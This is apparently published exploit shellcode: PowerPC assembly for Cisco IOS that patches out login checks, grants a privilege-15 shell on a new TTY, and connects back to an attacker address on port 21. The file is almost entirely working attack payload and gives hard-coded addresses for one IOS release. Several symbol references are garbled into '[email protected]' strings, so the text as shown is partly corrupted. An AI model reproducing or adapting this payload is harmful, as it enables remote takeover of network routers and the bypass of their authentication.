# ---------------------------------------------------------------------------------------- # # Cisco IOS Connectback shellcode v1.0 # (c) 2007 IRM Plc # By Gyan Chawdhary # # ---------------------------------------------------------------------------------------- # # The code creates a new TTY, allocates a shell with privilege level 15 and connects back # on port 21 # # This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. # # # The following five hard-coded addresses must be located for the target IOS version. # # The hard-coded addresses used here are for: # # IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) # # ---------------------------------------------------------------------------------------- .equ malloc, 0x804785CC .equ allocate_tty, 0x803d155c .equ ret, 0x804a42e8 .equ addr, 0x803c4ad8 .equ str, 0x81e270b4 .equ tcp_connect, 0x80567568 .equ tcp_execute_command, 0x8056c354 .equ login, 0x8359b1f4 .equ god, 0xff100000 .equ priv, 0x8359be64 # ---------------------------------------------------------------------------------------- main: stwu 1,-48(1) mflr 0 stw 31,44(1) stw 0,52(1) mr 31,1 li 3,512 lis 9,[email protected] #malloc() memory for tcp structure la 9,[email protected](9) mtctr 9 bctrl mr 0,3 stw 0,20(31) lwz 9,12(31) li 0,1 stb 0,0(9) lwz 9,12(31) lis 0,0xac1e # connect back ip address ori 0,0,1018 # stw 0,4(9) li 3,66 li 4,0 lis 9,[email protected] # allocate new TTY la 9,[email protected](9) mtctr 9 bctrl addi 0,31,24 # Fix TTY structure to enable level 15 shell without password # # ########################################################## # login patch begin lis 9, [email protected] la 9, [email protected](9) li 8,0 stw 8, 0(9) # login patch end #IDA placeholder for con0 # # lis %r9, ((stdio+0x10000)@h) # lwz %r9, [email protected](%r9) # lwz %r0, 0xDE4(%r9) #priv struct # # priv patch begin lis 9, [email protected] la 9, [email protected](9) lis 8, [email protected] la 8, [email protected](8) stw 8, 0(9) # priv patch end ########################################################### li 3,0 li 4,21 # Port 21 for connectback lwz 5,12(31) li 6,0 li 7,0 mr 8,0 li 9,0 lis 11,[email protected] # Connect to attacker IP la 11,[email protected](11) mtctr 11 bctrl mr 0,3 stw 0,20(31) li 3,66 lwz 4,20(31) li 5,0 li 6,0 li 7,0 li 8,0 li 9,0 li 10,0 lis 11,[email protected] # Execute Virtual Terminal on outgoing connection, similar to /bin/bash la 11,[email protected](11) mtctr 11 bctrl lwz 11,0(1) lwz 0,4(11) mtlr 0 lwz 31,-4(11) mr 1,11 ########################################### lis 9, [email protected] addi 0, 9, [email protected] mtctr 0 xor 3,3,3 addi 3,0, -2 lis 10, [email protected] addi 4, 10, [email protected] bctrl lis 10, [email protected] addi 4, 10, [email protected] mtctr 4 bctrl